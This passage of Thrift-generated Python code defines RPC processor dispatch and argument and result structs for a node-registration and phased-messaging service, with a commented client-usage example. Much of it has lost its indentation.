self._processMap["subscription_request"] = Processor.process_subscription_request
self._processMap["get_peers"] = Processor.process_get_peers
def process(self, iprot, oprot):
    (name, mtype, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_ping(self, seqid, iprot, oprot):
args = ping_args()
args.read(iprot)
iprot.readMessageEnd()
result = ping_result()
try:
self._handler.ping()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("ping", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_node_info(self, seqid, iprot, oprot):
args = get_node_info_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_node_info_result()
try:
result.success = self._handler.get_node_info()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except UnauthorizedException as unauthorized:
msg_type = TMessageType.REPLY
result.unauthorized = unauthorized
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_node_info", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_register_node(self, seqid, iprot, oprot):
args = register_node_args()
args.read(iprot)
iprot.readMessageEnd()
result = register_node_result()
try:
result.success = self._handler.register_node(args.node, args.pass_phrase)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except UnauthorizedException as unauthorized:
msg_type = TMessageType.REPLY
result.unauthorized = unauthorized
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("register_node", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_unregister_node(self, seqid, iprot, oprot):
args = unregister_node_args()
args.read(iprot)
iprot.readMessageEnd()
try:
self._handler.unregister_node(args.pass_phrase)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
    except Exception as ex:
      # Oneway call: no reply is ever written back, so a bare silent pass here
      # would hide handler failures entirely; log them instead.
      logging.exception(ex)
def process_phase_1_message(self, seqid, iprot, oprot):
args = phase_1_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_1_message_result()
try:
result.success = self._handler.phase_1_message(args.p1)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_1_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_2_message(self, seqid, iprot, oprot):
args = phase_2_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_2_message_result()
try:
result.success = self._handler.phase_2_message(args.p2)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_2_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_3_message(self, seqid, iprot, oprot):
args = phase_3_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_3_message_result()
try:
result.success = self._handler.phase_3_message(args.p3)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_3_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_4_message(self, seqid, iprot, oprot):
args = phase_4_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_4_message_result()
try:
result.success = self._handler.phase_4_message(args.p4)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_4_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_phase_5_message(self, seqid, iprot, oprot):
args = phase_5_message_args()
args.read(iprot)
iprot.readMessageEnd()
result = phase_5_message_result()
try:
result.success = self._handler.phase_5_message(args.p5)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("phase_5_message", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_receipt_request(self, seqid, iprot, oprot):
args = receipt_request_args()
args.read(iprot)
iprot.readMessageEnd()
result = receipt_request_result()
try:
result.success = self._handler.receipt_request(args.pass_phrase)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("receipt_request", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_transfer_data(self, seqid, iprot, oprot):
args = transfer_data_args()
args.read(iprot)
iprot.readMessageEnd()
result = transfer_data_result()
try:
result.success = self._handler.transfer_data(args.pass_phrase, args.received, args.unreceived)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("transfer_data", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_subscription_provisioning(self, seqid, iprot, oprot):
args = subscription_provisioning_args()
args.read(iprot)
iprot.readMessageEnd()
result = subscription_provisioning_result()
try:
self._handler.subscription_provisioning(args.subscription_id, args.criteria, args.phase_criteria, args.create_ts, args.public_key)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("subscription_provisioning", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_subscription_request(self, seqid, iprot, oprot):
args = subscription_request_args()
args.read(iprot)
iprot.readMessageEnd()
result = subscription_request_result()
try:
result.success = self._handler.subscription_request(args.subscription_id, args.subscription_signature)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("subscription_request", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_peers(self, seqid, iprot, oprot):
args = get_peers_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_peers_result()
try:
result.success = self._handler.get_peers()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except UnauthorizedException as unauthorized:
msg_type = TMessageType.REPLY
result.unauthorized = unauthorized
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("get_peers", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
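# --- Illustrative client usage (comment only; not part of the generated code) ---
# A minimal sketch of wiring the generated client to a server over a buffered
# binary transport. This assumes the enclosing client class is named Client and
# the server listens on localhost:9090, per standard Thrift-generated modules;
# adjust both to your deployment.
#
#   from thrift.transport import TSocket, TTransport
#   from thrift.protocol import TBinaryProtocol
#
#   transport = TTransport.TBufferedTransport(TSocket.TSocket('localhost', 9090))
#   protocol = TBinaryProtocol.TBinaryProtocol(transport)
#   client = Client(protocol)
#   transport.open()
#   client.ping()          # round-trip call
#   transport.close()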
# HELPER FUNCTIONS AND STRUCTURES
class ping_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ping_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_node_info_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_node_info_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_node_info_result:
"""
Attributes:
- success
- unauthorized
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (Node, Node.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, unauthorized=None,):
self.success = success
self.unauthorized = unauthorized
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Node()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.unauthorized = UnauthorizedException()
self.unauthorized.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_node_info_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.unauthorized is not None:
oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
self.unauthorized.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
value = (value * 31) ^ hash(self.unauthorized)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class register_node_args:
"""
Attributes:
- node
- pass_phrase
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'node', (Node, Node.thrift_spec), None, ), # 1
(2, TType.STRING, 'pass_phrase', None, None, ), # 2
)
def __init__(self, node=None, pass_phrase=None,):
self.node = node
self.pass_phrase = pass_phrase
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.node = Node()
self.node.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.pass_phrase = iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('register_node_args')
if self.node is not None:
oprot.writeFieldBegin('node', TType.STRUCT, 1)
self.node.write(oprot)
oprot.writeFieldEnd()
if self.pass_phrase is not None:
oprot.writeFieldBegin('pass_phrase', TType.STRING, 2)
oprot.writeString(self.pass_phrase)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.node)
value = (value * 31) ^ hash(self.pass_phrase)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class register_node_result:
"""
Attributes:
- success
- unauthorized
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, unauthorized=None,):
self.success = success
self.unauthorized = unauthorized
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.unauthorized = UnauthorizedException()
self.unauthorized.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('register_node_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.unauthorized is not None:
oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
self.unauthorized.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
value = (value * 31) ^ hash(self.unauthorized)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class unregister_node_args:
"""
Attributes:
- pass_phrase
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'pass_phrase', None, None, ), # 1
)
def __init__(self, pass_phrase=None,):
self.pass_phrase = pass_phrase
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.pass_phrase = iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('unregister_node_args')
if self.pass_phrase is not None:
oprot.writeFieldBegin('pass_phrase', TType.STRING, 1)
oprot.writeString(self.pass_phrase)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.pass_phrase)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_1_message_args:
"""
Attributes:
- p1
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'p1', (Phase_1_msg, Phase_1_msg.thrift_spec), None, ), # 1
)
def __init__(self, p1=None,):
self.p1 = p1
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.p1 = Phase_1_msg()
self.p1.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_1_message_args')
if self.p1 is not None:
oprot.writeFieldBegin('p1', TType.STRUCT, 1)
self.p1.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.p1)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_1_message_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype98, _size95) = iprot.readListBegin()
          for _i99 in xrange(_size95):
            _elem100 = iprot.readString()
            self.success.append(_elem100)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('phase_1_message_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRING, len(self.success))
      for iter101 in self.success:
        oprot.writeString(iter101)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.success)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class phase_2_message_args:
  """
  Attributes:
   - p2
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'p2', (Phase_2_msg, Phase_2_msg.thrift_spec), None, ), # 1
  )

  def __init__(self, p2=None,):
    self.p2 = p2

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.p2 = Phase_2_msg()
          self.p2.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('phase_2_message_args')
    if self.p2 is not None:
      oprot.writeFieldBegin('p2', TType.STRUCT, 1)
      self.p2.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.p2)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class phase_2_message_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype105, _size102) = iprot.readListBegin()
          for _i106 in xrange(_size102):
            _elem107 = iprot.readString()
            self.success.append(_elem107)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('phase_2_message_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRING, len(self.success))
      for iter108 in self.success:
        oprot.writeString(iter108)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.success)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class phase_3_message_args:
  """
  Attributes:
   - p3
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'p3', (Phase_3_msg, Phase_3_msg.thrift_spec), None, ), # 1
  )

  def __init__(self, p3=None,):
    self.p3 = p3

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.p3 = Phase_3_msg()
          self.p3.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('phase_3_message_args')
    if self.p3 is not None:
      oprot.writeFieldBegin('p3', TType.STRUCT, 1)
      self.p3.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __hash__(self):
    value = 17
    value = (value * 31) ^ hash(self.p3)
    return value

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class phase_3_message_result:
  """
  Attributes:
   - success
  """

  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
  )

  def __init__(self, success=None,):
    self.success = success

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype112, _size109) = iprot.readListBegin()
          for _i113 in xrange(_size109):
            _elem114 = iprot.readString()
            self.success.append(_elem114)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
